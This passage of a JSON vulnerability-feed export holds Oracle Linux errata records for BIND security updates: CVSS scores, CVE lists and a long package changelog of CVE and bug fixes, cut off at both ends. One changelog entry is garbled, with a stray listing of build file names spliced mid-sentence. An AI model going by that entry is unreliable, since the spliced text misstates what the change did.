"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-10-20T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848"], "modified": "2016-10-20T00:00:00", "id": "ELSA-2016-2093", "href": "http://linux.oracle.com/errata/ELSA-2016-2093.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "[32:9.8.2-0.68.rc1.0.3.8]\n- Backport fix for CVE-2018-5741 [Orabug: 33496185]\n[32:9.8.2-0.68.rc1.0.2.8]\n- Backport possible assertion failure on DNAME processing (CVE-2021-25215)\n[32:9.8.2-0.68.rc1.0.1.8]\n- Backport the fix for buffer overflow (CVE-2020-8625) (Orabug: 32588749)\n[32:9.8.2-0.68.rc1.8]\n- Fix tsig-request verify (CVE-2020-8622)\n[32:9.8.2-0.68.rc1.7]\n- Correct tests covering CVE-2020-8617\n[32:9.8.2-0.68.rc1.6]\n- Add additional fix to limit recursions\n[32:9.8.2-0.68.rc1.5]\n- Add CVE tests to codebase\n[32:9.8.2-0.68.rc1.4]\n- Limit number of queries triggered by a request (CVE-2020-8616)\n- Fix invalid tsig request (CVE-2020-8617)\n[32:9.8.2-0.68.rc1.3]\n- Use only selected documentation files\n[32:9.8.2-0.68.rc1.2]\n- Fix CVE-2018-5743\n[32:9.8.2-0.68.rc1.1]\n- Fix CVE-2018-5740\n[32:9.8.2-0.68.rc1]\n- Fix CVE-2017-3145\n[32:9.8.2-0.67.rc1]\n- Change EDNS flags only after successful query (#1416035)\n- Fix crash in ldap driver at bind-sdb stop (#1426626)\n[32:9.8.2-0.66.rc1]\n- Fix CVE-2017-3142 and CVE-2017-3143\n[32:9.8.2-0.65.rc1]\n- Update root servers and trust anchors\n[32:9.8.2-0.64.rc1]\n- Fix DNSKEY that encountered a CNAME (#1447872, ISC change 3391)\n[32:9.8.2-0.63.rc1]\n- Fix CVE-2017-3136 (ISC change 4575)\n- Fix CVE-2017-3137 (ISC change 4578)\n[32:9.8.2-0.62.rc1]\n- Fix and test caching CNAME before DNAME (ISC change 4558)\n[32:9.8.2-0.61.rc1]\n- Fix CVE-2016-9147 (ISC change 4510)\n- Fix regression introduced by CVE-2016-8864 (ISC change 4530)\n[32:9.8.2-0.60.rc1]\n- Restore SELinux contexts before named restart\n[32:9.8.2-0.59.rc1]\n- Use /lib or /lib64 only if directory in chroot already exists\n- Tighten NSS library pattern, escape chroot mount path\n[32:9.8.2-0.58.rc1]\n- Fix CVE-2016-8864\n[32:9.8.2-0.57.rc1]\n- Do not change lib permissions in chroot (#1321239)\n- Support WKS records in chroot (#1297562)\n[32:9.8.2-0.56.rc1]\n- Do not include patch backup in docs (fixes #1325081 patch)\n[32:9.8.2-0.55.rc1]\n- Backported relevant parts of [RT #39567] (#1259923)\n[32:9.8.2-0.54.rc1]\n- Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n[32:9.8.2-0.53.rc1]\n- Fix multiple realms in nsupdate script like upstream (#1313286)\n[32:9.8.2-0.52.rc1]\n- Fix multiple realm in nsupdate script (#1313286)\n[32:9.8.2-0.51.rc1]\n- Use resolver-query-timeout high enough to recover all forwarders (#1325081)\n[32:9.8.2-0.50.rc1]\n- Fix CVE-2016-2848\n[32:9.8.2-0.49.rc1]\n- Fix infinite loop in start_lookup (#1306504)\n[32:9.8.2-0.48.rc1]\n- Fix CVE-2016-2776\n[32:9.8.2-0.47.rc1]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.8.2-0.46.rc1]\n- Fix CVE-2015-8704\n[32:9.8.2-0.45.rc1]\n- Updated named.ca hints file to the latest version (#1267991)\n[32:9.8.2-0.44.rc1]\n- Fix CVE-2015-8000\n[32:9.8.2-0.43.rc1]\n- Fix excessive queries caused by DS chasing with stub zones when DNSSEC is not used (#1227189)\n- Added the fixed tarball with configuration to Sources (Related: #1223359)\n[32:9.8.2-0.42.rc1]\n- Don't use ISC's DLV by default (#1223359)\n[32:9.8.2-0.41.rc1]\n- Added support for CAA records (#1252611)\n[32:9.8.2-0.40.rc1]\n- Fix CVE-2015-5722\n[32:9.8.2-0.39.rc1]\n- Fix CVE-2015-5477\n[32:9.8.2-0.38.rc1]\n- Fix CVE-2015-4620\n[32:9.8.2-0.37.rc1]\n- Resolves: 1215687 - DNS resolution failure in high load environment with\n SERVFAIL and 'out of memory/success' in the log\n[32:9.8.2-0.36.rc1]\n- Fix CVE-2015-1349\n[32:9.8.2-0.35.rc1]\n- Enable RPZ-NSIP and RPZ-NSDNAME during compilation (#1176476)\n[32:9.8.2-0.34.rc1]\n- Fix race condition when using isc__begin_beginexclusive (#1175321)\n[32:9.8.2-0.33.rc1]\n- Sanitize SDB API to better handle database errors (#1146893)\n[32:9.8.2-0.32.rc1]\n- Fix CVE-2014-8500 (#1171974)\n[32:9.8.2-0.31.rc1]\n- Fix RRL slip behavior when set to 1 (#1112356)\n- Fix issue causing bind to hang after reload if using DYNDB (#1142152)\n[32:9.8.2-0.30.rc1]\n- Use /dev/urandom when generating rndc.key file (#951255)\n[32:9.8.2-0.29.rc1]\n- Remove bogus file from /usr/share/doc, introduced by fix for bug #1092035\n[32:9.8.2-0.28.rc1]\n- Add support for TLSA resource records (#956685)\n- Increase defaults for lwresd workers and make workers and client objects number configurable (#1092035)\n[32:9.8.2-0.27.rc1]\n- Fix segmentation fault in nsupdate when -r option is used (#1064045)\n- Fix race condition on send buffer in host tool when sending UDP query (#1008827)\n- Allow authentication using TSIG in allow-notify configuration statement (#1044545)\n- Fix SELinux context of /var/named/chroot/etc/localtime (#902431)\n- Include updated named.ca file with root server addresses (#917356)\n- Don't generate rndc.key if there is rndc.conf on start-up (#997743)\n- Fix dig man page regarding how to disable IDN (#1023045)\n- Handle ICMP Destination unreachable (Protocol unreachable) response (#1066876)\n[32:9.8.2-0.26.rc1]\n- Configure BIND with --with-dlopen=yes to support dynamically loadable DLZ drivers (#846065)\n- Fix initscript to return correct exit value when calling checkconfig/configtest/check/test (#848033)\n- Don't (un)mount chroot filesystem when running initscript command configtest with running server (#851123)\n- Fix zone2sqlite tool to accept zones containing '.' or '-' or starting with a digit (#919414)\n- Fix initscript not to mount chroot filesystem is named is already running (#948743)\n- Fix initscript to check if the PID in PID-file is really s PID of running named server (#980632)\n- Correct the installed documentation ownership (#1051283)\n[32:9.8.2-0.25.rc1]\n- configure with --enable-filter-aaaa to enable use of filter-aaaa-on-v4 option (#1025008)\n- Fix race condition when destroying a resolver fetch object (#993612)\n- Fix the RRL functionality to include referrals-per-second and nodata-per-second options (#1036700)\n- Fix segfault on SERVFAIL to NXDOMAIN failover (#919545)\n[32:9.8.2-0.24.rc1]\n- Fix CVE-2014-0591\n[32:9.8.2-0.23.rc1]\n- Fix gssapictx memory leak (#911167)\n[32:9.8.2-0.22.rc1]\n- fix CVE-2013-4854\n[32:9.8.2-0.21.rc1]\n- fix CVE-2013-2266\n- ship dns/rrl.h in -devel subpkg\n[32:9.8.2-0.20.rc1]\n- remove one bogus file from /usr/share/doc, introduced by RRL patch\n[32:9.8.2-0.19.rc1]\n- fix CVE-2012-5689\n[32:9.8.2-0.18.rc1]\n- add response rate limit patch (#873624)\n[32:9.8.2-0.17.rc1]\n- fix CVE-2012-5688\n[32:9.8.2-0.16.rc1]\n- initscript: silence spurious 'named.pid: No such file' error\n[32:9.8.2-0.15.rc1]\n- fix CVE-2012-5166\n[32:9.8.2-0.14.rc1]\n- allow forward{,ers} statement in static-stub zones\n[32:9.8.2-0.13.rc1]\n- fix CVE-2012-4244\n[32:9.8.2-0.12.rc1]\n- fix CVE-2012-3817\n[32:9.8.2-0.11.rc1]\n- fix rbtnode.deadlink INSIST failures in rbtdb.c (#837165)\n[32:9.8.2-0.10.rc1]\n- fix CVE-2012-1667\n[32:9.8.2-0.9.rc1]\n- fix race condition in the resolver module\n- nslookup: return non-zero exit code when fail to get answer (#816164)\n[32:9.8.2-0.8.rc1]\n- initscript: don't umount /var/named when didn't mount it\n[32:9.8.2-0.7.rc1]\n- don't fail when logfile cannot be opened (#809084)\n[32:9.8.2-0.6.rc1]\n- fix multilib regression in bind-devel (#800053)\n[32:9.8.2-0.5.rc1]\n- fix errors reported by Coverity\n- be more strict when caching NS RRsets (CVE-2012-1033)\n[32:9.8.2-0.4.rc1]\n- load dynamic-db plugins later (#795414)\n[32:9.8.2-0.3.rc1]\n- decrease severity of various errors related to outside DNS environment\n (#788870)\n- fixed various bind-chroot packaging errors (#789886)\n- use portreserve to reserve rndc control port (#790682)\n[32:9.8.2-0.2.rc1]\n- harden dns_zone_setmasterswithkeys() to avoid INSIST failures\n- build with '--enable-fixed-rrset'\n- fix potential memory leak in code which processes rndc authentication\n (#749582)\n- generate rndc.key during (#768798)\n- nslookup: improve handling of AA responses with recursion off\n- removed obsolete bind97-rh714049.patch patch\n[32:9.8.2-0.1.rc1]\n- update to 9.8.2rc1\n- patches merged\n - bind97-rh754398.patch\n - bind97-rh700097.patch\n - bind97-rh734502.patch\n - bind97-rh746694-1.patch\n - bind97-rh746694-2.patch\n - bind97-rh739406-1.patch\n - bind97-rh739406-2.patch\n- ship DNSKEY for root zone in default configuration\n[32:9.7.3-10.P3]\n- disable atomic ops on ppc* because they caused named to hang/crash\n[32:9.7.3-9.P3]\n- fix race condition in resolver.c:validated()\n- improve error handling in zone.c:zone_refreshkeys() to avoid\n hang during shutdown\n[32:9.7.3-8.P3]\n- fix DOS against recursive servers (#754398)\n[32:9.7.3-7.P3]\n- fix memory leak in nsupdate when using SIG(0) keys\n[32:9.7.3-6.P3]\n- load/unload dyndb plugins on appropriate places to avoid crashes (#725577)\n- nsupdate could have failed if server has multiple IPs and the first\n was unreachable (#714049)\n- nsupdate returned zero when target zone didn't exist (#700097)\n- readd configtest target to initscript\n- print 'the working directory is not writable' as debug message\n- fix some Coverity warnings\n[32:9.7.3-5.P3]\n- fix rare race condition in request.c\n[32:9.7.3-4.P3]\n- update to 9.7.3-P3 (CVE-2011-2464)\n[32:9.7.3-3.P1]\n- update to 9.7.3-P1 (CVE-2011-1910)\n[32:9.7.3-2]\n- don't generate rndc.key during installation\n[32:9.7.3-1]\n- update to 9.7.3 (CVE-2011-0414)\n- patches merged\n - bind97-gsstsig.patch\n - bind97-rh664401.patch\n - bind97-rh623638.patch\n[32:9.7.2-8.P3]\n- regenerate fixed nsupdate manual page\n[32:9.7.2-7.P3]\n- improve host/dig resolv.conf parser (#rh669163)\n- improve internal test suite\n- don't mention that HMAC-MD5 is the only one TSIG algorighm\n in nsupdate manpage\n- initscript: sybsys name is always named, not named-sdb\n[32:9.7.2-6.P3]\n- named could die on exit after negotiating a GSS-TSIG key (#653486)\n- fix typo in initscript\n[32:9.7.2-5.P3]\n- include root zone DNSKEY in the bind package (#667375)\n[32:9.7.2-4.P3]\n- solve conflict between i686 and x86_64 bind-devel packages (#658045)\n- fix 'service named status' when used with named-sdb\n- fix 'krb5-self' update-policy rule processing (#664401)\n- don't check MD5, size and mtime of sysconfig/named\n[32:9.7.2-3.P3]\n- use same atomic operations on both ppc and ppc64 (#623638)\n- add new option DISABLE_ZONE_CHECKING to sysconfig/named (#623673)\n- document dig exit codes\n- add Requires: bind-libs to bind subpkgs\n- remove statement about system-config-bind from named.8 manpage (#660676)\n[32:9.7.2-2.P3]\n- host utility now honors 'attempts', 'timeout' and 'debug' options in\n resolv.conf (#622764)\n- initscript should kill only the 'correct' named process (#622785)\n- attempt to reconnect to PostgreSQL during each query if the initial\n connection failed (#623190)\n[32:9.7.2-1.P3]\n- update to 9.7.2-P3 (#623122)\n- patch bind97-managed-keyfile.patch replaced by bind97-compat-keysdir.patch\n- patches merged\n - bind97-rh554316.patch\n - bind97-rh576906.patch\n[32:9.7.0-5.P2]\n- update to 9.7.0-P2\n[32:9.7.0-4.P1]\n- fix occassional crash on keytable.c:286 (#554316)\n- active query might be destroyed in resume_dslookup() which triggered REQUIRE\n failure (#507429)\n[32:9.7.0-3.P1]\n- update to 9.7.0-P1 release\n[32:9.7.0-2]\n- improve automatic DNSSEC reconfiguration trigger\n- initscript now returns 2 in case that action doesn't exist (#523435)\n- enable/disable chroot when bind-chroot is installed/uninstalled\n[32:9.7.0-1]\n- update to production 9.7.0 release\n[32:9.7.0-0.14.rc2]\n- obsolete dnssec-conf\n- automatically update configuration from old dnssec-conf based\n- improve default configuration; enable DLV by default\n- remove obsolete triggerpostun from bind-libs subpackage\n[32:9.7.0-0.13.rc2]\n- update to 9.7.0rc2 bugfix release (CVE-2010-0097 and CVE-2010-0290)\n[32:9.7.0-0.12.rc1]\n- initscript LSB related fixes (#523435)\n- revert the 'DEBUG' feature (#510283), it causes too many problems (#545128)\n[32:9.7.0-0.11.rc1]\n- disable PKCS11 support. PKCS11 support in openssl is not available in RHEL6\n[32:9.7.0-0.10.rc1]\n- update to 9.7.0rc1\n- bind97-headers.patch merged\n- update default configuration\n[32:9.7.0-0.9.b3]\n- update to 9.7.0b3\n[32:9.7.0-0.8.b2]\n- install isc/namespace.h header\n[32:9.7.0-0.7.b2]\n- update to 9.7.0b2\n[32:9.7.0-0.6.b1]\n- update to 9.7.0b1\n- add bind-pkcs11 subpackage to support PKCS11 compatible keystores for DNSSEC\n keys\n[32:9.7.0-0.5.a3]\n- don't package named-bootconf utility, it is very outdated and unneeded\n[32:9.7.0-0.4.a3]\n- determine file size via instead of 32_details\n32_list\n32_list_to_copy\n32_list_to_copy_details\n32_list_to_copy_details.out\n32_list_to_copy_details.out_1\n32_list_to_remove_and_ln\n64_details\n64_list\n64_list_to_copy\n64_list_to_copy_details\n64_list_to_copy_details.out\n64_list_to_copy_details.out_1\n64_list_to_remove_and_ln\n6.6\n67_32_list\n67_32_list_1\n67_64_list\n67_64_list_1\n67_src_list\n67_src_list_1\nbak\nbaselist\nbaselist.out\nctllist.ELBA-2020-5554-6\nctllist.ELSA-2022-9117-6\nctllist.RHBA-2020-3543-6\nctllist.RHSA-2019-3756-6\ni386_rpms\nk\nnext.ctllist.ELSA-2015-3055-6\npending\nsav.ctllist.RHBA-2017-3213-6a\nsrc_32_list_to_copy_details\nsrc_32_list_to_copy_details.out\nsrc_32_list_to_copy_details.out_1\nsrc_64_list_to_copy_details\nsrc_64_list_to_copy_details.out\nsrc_64_list_to_copy_details.out_1\nsrc_details\nsrc_list\nsrc_list_to_copy\nsrc_list_to_copy_32\nsrc_list_to_copy_64\nsrc_list_to_remove_and_ln\nsrc_list_to_remove_and_ln_64\nsrc_rpms\nx86_64_rpms (#523682)\n[32:9.7.0-0.3.a3]\n- update to 9.7.0a3\n[32:9.7.0-0.2.a2]\n- improve chroot related documentation (#507795)\n- add NetworkManager dispatcher script to reload named when network interface is\n activated/deactivated (#490275)\n- don't set/unset named_write_master_zones SELinux boolean every time in\n initscript, modify it only when it's actually needed\n[32:9.7.0-0.1.a2]\n- update to 9.7.0a2\n- merged patches\n - bind-96-db_unregister.patch\n - bind96-rh507469.patch\n[32:9.6.1-9.P1]\n- next attempt to fix the postun trigger (#520385)\n- remove obsolete bind-9.3.1rc1-fix_libbind_includedir.patch\n[32:9.6.1-8.P1]\n- rebuilt with new openssl\n[32:9.6.1-7.P1]\n- update the patch for dynamic loading of database backends\n[32:9.6.1-6.P1]\n- 9.6.1-P1 release (CVE-2009-0696)\n- fix postun trigger (#513016, hopefully)\n[32:9.6.1-5]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n[32:9.6.1-4]\n- remove useless bind-9.3.3rc2-rndckey.patch\n[32:9.6.1-3]\n- fix broken symlinks in bind-libs (#509635)\n- fix typos in /etc/sysconfig/named (#509650)\n- add DEBUG option to /etc/sysconfig/named (#510283)\n[32:9.6.1-2]\n- improved 'chroot automount' patches (#504596)\n- host should fail if specified server doesn't respond (#507469)\n[32:9.6.1-1]\n- 9.6.1 release\n- simplify chroot maintenance. Important files and directories are mounted into\n chroot (see /etc/sysconfig/named for more info, #504596)\n- fix doc/named.conf.default perms\n[32:9.6.1-0.4.rc1]\n- 9.6.1rc1 release\n[32:9.6.1-0.3.b1]\n- update the patch for dynamic loading of database backends\n- create %{_libdir}/bind directory\n- copy default named.conf to doc directory, shared with s-c-bind (atkac)\n[32:9.6.1-0.2.b1]\n- update the patch for dynamic loading of database backends\n- fix dns_db_unregister()\n- useradd now takes '-N' instead of '-n' (atkac, #495726)\n- print nicer error msg when zone file is actually a directory (atkac, #490837)\n[32:9.6.1-0.1.b1]\n- 9.6.1b1 release\n- patches merged\n - bind-96-isc_header.patch\n - bind-95-rh469440.patch\n - bind-96-realloc.patch\n - bind9-fedora-0001.diff\n- use -version-number instead of -version-info libtool param\n[32:9.6.0-11.1.P1]\n- logrotate configuration file now points to /var/named/data/named.run by\n default (#489986)\n[32:9.6.0-11.P1]\n- fall back to insecure mode when no supported DNSSEC algorithm is found\n instead of SERVFAIL\n- don't fall back to non-EDNS0 queries when DO bit is set\n[32:9.6.0-10.P1]\n- enable DNSSEC only if it is enabled in sysconfig/dnssec\n[32:9.6.0-9.P1]\n- add DNSSEC support to initscript, enabled it per default\n- add requires dnssec-conf\n[32:9.6.0-8.P1]\n- fire away libbind, it is now separate package\n[32:9.6.0-7.P1]\n- fixed some read buffer overflows (upstream)\n[32:9.6.0-6.P1]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[32:9.6.0-5.P1]\n- update the patch for dynamic loading of database backends\n- include iterated_hash.h\n[32:9.6.0-4.P1]\n- rebuild for dependencies\n[32:9.6.0-3.P1]\n- rebuild against new openssl\n[32:9.6.0-2.P1]\n- 9.6.0-P1 release (CVE-2009-0025)\n[32:9.6.0-1]\n- Happy new year\n- 9.6.0 release\n[32:9.6.0-0.7.rc2]\n- 9.6.0rc2 release\n- bind-96-rh475120.patch merged\n[32:9.6.0-0.6.rc1]\n- add patch for dynamic loading of database backends\n[32:9.6.0-0.5.1.rc1]\n- allow to reuse address for non-random query-source ports (#475120)\n[32:9.6.0-0.5.rc1]\n- 9.6.0rc1 release\n- patches merged\n - bind-9.2.0rc3-varrun.patch\n - bind-95-sdlz-include.patch\n - bind-96-libxml2.patch\n- fixed rare use-after-free problem in host utility (#452060)\n- enabled chase of DNSSEC signature chains in dig\n[32:9.6.0-0.4.1.b1]\n- improved sample config file (#473586)\n[32:9.6.0-0.4.b1]\n- reverted previous change, koji doesn't like it\n[32:9.6.0-0.3.b1]\n- build bind-chroot as noarch\n[32:9.6.0-0.2.1.b1]\n- updates due libtool 2.2.6\n- don't pass -DLDAP_DEPRECATED to cpp, handle it directly in sources\n[32:9.6.0-0.2.b1]\n- make statistics http server working, patch backported from 9.6 HEAD\n[32:9.6.0-0.1.b1]\n- 9.6.0b1 release\n- don't build ODBC and Berkeley DB DLZ drivers\n- end of bind-chroot-admin script, copy config files to chroot manually\n- /proc doesn't have to be mounted to chroot\n- temporary use libbind from 9.5 series, noone has been released for 9.6 yet\n[32:9.5.1-0.8.4.b2]\n- dig/host: use only IPv4 addresses when -4 option is specified (#469440)\n[32:9.5.1-0.8.2.b2]\n- removed unneeded bind-9.4.1-ldap-api.patch\n[32:9.5.1-0.8.1.b2]\n- ship dns/{s,}dlz.h and isc/radix.h in bind-devel\n[32:9.5.1-0.8.b2]\n- removed bind-9.4.0-dnssec-directory.patch, it is wrong\n[32:9.5.1-0.7.b2]\n- 9.5.1b2 release\n- patches merged\n - bind95-rh454783.patch\n - bind-9.5-edns.patch\n - bind95-rh450995.patch\n - bind95-rh457175.patch\n[32:9.5.1-0.6.b1]\n- IDN output strings didn't honour locale settings (#461409)\n[32:9.5.1-0.5.b1]\n- disable transfer stats on DLZ zones (#454783)\n[32:9.5.1-0.4.b1]\n- add forgotten patch for #457175\n- build with -O2\n[32:9.5.1-0.3.b1]\n- static libraries are no longer supported\n- IP acls weren't merged correctly (#457175)\n- use fPIE on sparcv9/sparc64 (Dennis Gilmore)\n- add sparc64 to list of 64bit arches in spec (Dennis Gilmore)\n[32:9.5.1-0.2.b1]\n- updated patches due new rpm (--fuzz=0 patch parameter)\n[32:9.5.1-0.1.1.b1]\n- use %patch0 for Patch0 (#455061)\n- correct source address (#455118)\n[32:9.5.1-0.1.b1]\n- 9.5.1b1 release (CVE-2008-1447)\n- dropped bind-9.5-recv-race.patch because upstream doesn't want it\n[32:9.5.0-37.1]\n- update default named.conf statements (#452708)\n[32:9.5.0-37]\n- some compat changes to fix building on RHEL4\n[32:9.5.0-36.3]\n- fixed typo in %posttrans script\n[32:9.5.0-36.2]\n- parse inner acls correctly (#450995)\n[32:9.5.0-36.1]\n- removed dns-keygen utility in favour of rndc-confgen -a (#449287)\n- some minor sample fixes (#449274)\n[32:9.5.0-36]\n- updated to 9.5.0 final\n- use getifaddrs to find available interfaces\n[32:9.5.0-35.rc1]\n- make /var/run/named writable by named (#448277)\n- fixed one non-utf8 file\n[32:9.5.0-34.rc1]\n- fixes needed to pass package review (#225614)\n[32:9.5.0-33.1.rc1]\n- bind-chroot now depends on bind (#446477)\n[32:9.5.0-33.rc1]\n- updated to 9.5.0rc1\n- merged patches\n - bind-9.5-libcap.patch\n- make binaries readable by others (#427826)\n[32:9.5.0-32.b3]\n- reverted 'any' patch, upstream says not needed\n- log EDNS failure only when we really switch to plain EDNS (#275091)\n- detect configuration file better\n[32:9.5.0-31.1.b3]\n- addresses 0.0.0.0 and ::0 really match any (#275091, comment #28)\n[32:9.5.0-31.b3]\n- readded bind-9.5-libcap.patch\n- added bind-9.5-recv-race.patch from F8 branch (#400461)\n[32:9.5.0-30.1.b3]\n- build Berkeley DB DLZ backend\n[32:9.5.0-30.b3]\n- 9.5.0b3 release\n- dropped patches (upstream)\n - bind-9.5-transfer-segv.patch\n - bind-9.5-mudflap.patch\n - bind-9.5.0-generate-xml.patch\n - bind-9.5-libcap.patch\n[32:9.5.0-29.3.b2]\n- fixed named.conf.sample file (#437569)\n[32:9.5.0-29.2.b2]\n- fixed URLs\n[32:9.5.0-29.1.b2]\n- BuildRequires cleanup\n[32:9.5.0-29.b2]\n- rebuild without mudflap (#434159)\n[32:9.5.0-28.b2]\n- port named to use libcap library, enable threads (#433102)\n- removed some unneeded Requires\n[32:9.5.0-27.b2]\n- removed conditional build with libefence (use -fmudflapth instead)\n- fixed building of DLZ stuff (#432497)\n- do not build Berkeley DB DLZ backend\n- temporary build with --disable-linux-caps and without threads (#433102)\n- update named.ca file to affect IPv6 changes in root zone\n[32:9.5.0-26.b2]\n- build with -D_GNU_SOURCE (#431734)\n- improved fix for #253537, posttrans script is now used\n- improved fix for #400461\n- 9.5.0b2\n - bind-9.3.2b1-PIE.patch replaced by bind-9.5-PIE.patch\n - only named, named-sdb and lwresd are PIE\n - bind-9.5-sdb.patch has been updated\n - bind-9.5-libidn.patch has been updated\n - bind-9.4.0-sdb-sqlite-bld.patch replaced by bind-9.5-sdb-sqlite-bld.patch\n - removed bind-9.5-gssapi-header.patch (upstream)\n - removed bind-9.5-CVE-2008-0122.patch (upstream)\n- removed bind-9.2.2-nsl.patch\n- improved sdb_tools Makefile.in\n[32:9.5.0-25.b1]\n- fixed segfault during sending notifies (#400461)\n- rebuild with gcc 4.3 series\n[32:9.5.0-24.b1]\n- removed bind-9.3.2-prctl_set_dumpable.patch (upstream)\n- allow parallel building of libdns library\n- CVE-2008-0122\n[32:9.5.0-23.b1]\n- fixed initscript wait loop (#426382)\n- removed dependency on policycoreutils and libselinux (#426515)\n[32:9.5.0-22.b1]\n- fixed regression caused by libidn2 patch (#426348)\n[32:9.5.0-21.b1]\n- fixed typo in post section (CVE-2007-6283)\n[32:9.5.0-20.b1]\n- removed obsoleted triggers\n- CVE-2007-6283\n[32:9.5.0-19.2.b1]\n- added dst/gssapi.h to -devel subpackage (#419091)\n- improved fix for (#417431)\n[32:9.5.0-19.1.b1]\n- fixed shutdown with initscript when rndc doesn't work (#417431)\n- fixed IDN patch (#412241)\n[32:9.5.0-19.b1]\n- 9.5.0b1 (#405281, #392491)\n[32:9.5.0-18.6.a7]\n- Rebuild for deps\n[32:9.5.0-18.5.a7]\n- build with -O0\n[32:9.5.0-18.4.a7]\n- bind-9.5-random_ports.patch was removed because upstream doesn't\n like it. query-source{,v6} options are sufficient (#391931)\n- bind-chroot-admin called restorecon on /proc filesystem (#405281)\n[32:9.5.0-18.3.a7]\n- removed edns patch to keep compatibility with vanilla bind\n (#275091, comment #20)\n[32:9.5.0-18.2.a7]\n- use system port selector instead ISC's (#391931)\n[32:9.5.0-18.a7]\n- removed statement from initscript which passes -D to named\n[32:9.5.0-17.a7]\n- 9.5.0a7\n- dropped patches (upstream)\n - bind-9.5-update.patch\n - bind-9.5-pool_badfree.patch\n - bind-9.5-_res_errno.patch\n[32:9.5.0-16.5.a6]\n- added bind-sdb again, contains SDB modules and DLZ modules\n- bind-9.3.1rc1-sdb.patch replaced by bind-9.5-sdb.patch\n[32:9.5.0-16.4.a6]\n- removed Requires: openldap, postgresql, mysql, db4, unixODBC\n- new L.ROOT-SERVERS.NET address\n[32:9.5.0-16.3.a6]\n- completely disable DBUS\n[32:9.5.0-16.2.a6]\n- minor cleanup in bind-chroot-admin\n[32:9.5.0-16.1.a6]\n- fixed typo in initscript\n[32:9.5.0-16.a6]\n- disabled DBUS (dhcdbd doesn't exist & #339191)\n[32:9.5.0-15.1.a6]\n- fixed missing va_end () functions (#336601)\n- fixed memory leak when dbus initialization fails\n[32:9.5.0-15.a6]\n- corrected named.5 SDB statement (#326051)\n[32:9.5.0-14.a6]\n- added edns patch again (#275091)\n[32:9.5.0-13.a6]\n- removed bind-9.3.3-edns.patch patch (see #275091 for reasons)\n[32:9.5.0-12.4.a6]\n- build with O2\n- removed 'autotools' patch\n- bugfixing in bind-chroot-admin (#279901)\n[32:9.5.0-12.a6]\n- bind-9.5-2119_revert.patch and bind-9.5-fix_h_errno.patch are\n obsoleted by upstream bind-9.5-_res_errno.patch\n[32:9.5.0-11.9.a6]\n- fixed wrong resolver's dispatch pool cleanup (#275011, patch from\n tmraz redhat com)\n[32:9.5.0-11.3.a6]\n- initscript failure message is now printed correctly (#277981,\n Quentin Armitage (quentin armitage org uk) )\n[32:9.5.0-11.2.a6]\n- temporary revert ISC 2119 change and add 'libbind-errno' patch\n (#254501) again\n[32:9.5.0-11.1.a6]\n- removed end dots from Summary sections (skasal@redhat.com)\n- fixed wrong file creation by autotools patch (skasal@redhat.com)\n[32:9.5.0-11.a6]\n- start using --disable-isc-spnego configure option\n - remove bind-9.5-spnego-memory_management.patch (source isn't\n compiled)\n[32:9.5.0-10.2.a6]\n- added new initscript option KEYTAB_FILE which specified where\n is located kerberos .keytab file for named service\n- obsolete temporary bind-9.5-spnego-memory_management.patch by\n bind-9.5-gssapictx-free.patch which conforms BIND coding standards\n (#251853)\n[32:9.5.0-10.a6]\n- dropped direct dependency to /etc/openldap/schema directory\n- changed hardcoded paths to macros\n- fired away code which configure LDAP server\n[32:9.5.0-9.1.a6]\n- named could crash with SRV record UPDATE (#251336)\n[32:9.5.0-9.a6]\n- disable 64bit dlz driver patch on alpha and ia64 (#251298)\n- remove wrong malloc functions from lib/dns/spnego.c (#251853)\n[32:9.5.0-8.2.a6]\n- changed licence from BSD-like to ISC\n[32:9.5.0-8.1.a6]\n- disabled named on all runlevels by default\n[32:9.5.0-8.a6]\n- minor next improvements on autotools patch\n- dig and host utilities now using libidn instead idnkit for\n IDN support\n[32:9.5.0-7.a6]\n- binutils/gcc bug rebuild (#249435)\n[32:9.5.0-6.a6]\n- updated to 9.5.0a6 which contains fixes for CVE-2007-2925 and\n CVE-2007-2926\n- fixed building on 64bits\n[31:9.5.0a5-5]\n- integrated 'autotools' patch for testing purposes (upstream will\n accept it in future, for easier building)\n[31:9.5.0a5-4.1]\n- fixed DLZ drivers building on 64bit systems\n[31:9.5.0a5-4]\n- fixed relation between logrotated and chroot-ed named\n[31:9.5.0a5-3.9]\n- removed bind-sdb package (default named has compiled SDB backend now)\n- integrated DLZ (Dynamically loadable zones) drivers\n- integrated GSS-TSIG support (RFC 3645)\n- build with -O0 (many new features, potential core dumps will be more useful)\n[31:9.5.0a5-3.2]\n- initscript should be ready for parallel booting (#246878)\n[31:9.5.0a5-3]\n- handle integer overflow in isc_time_secondsastimet function gracefully (#247856)\n[31:9.5.0a5-2.2]\n- moved chroot configfiles into chroot subpackage (#248306)\n[31:9.5.0a5-2]\n- minor changes in default configuration\n- fix h_errno assigment during resolver initialization (unbounded recursion, #245857)\n- removed wrong patch to #150288\n[31:9.5.0a5-1]\n- updated to latest upstream\n[31:9.4.1-7]\n- marked caching-nameserver as obsolete (#244604)\n- fixed typo in initscript (causes that named doesn't detect NetworkManager\n correctly)\n- next cleanup in configuration - moved configfiles into config.tar\n- removed delay between start & stop in restart function in named.init\n[31:9.4.1-6]\n- major changes in initscript. Could be LSB compatible now\n- removed caching-nameserver subpackage. Move configs from this\n package to main bind package as default configuration and major\n configuration 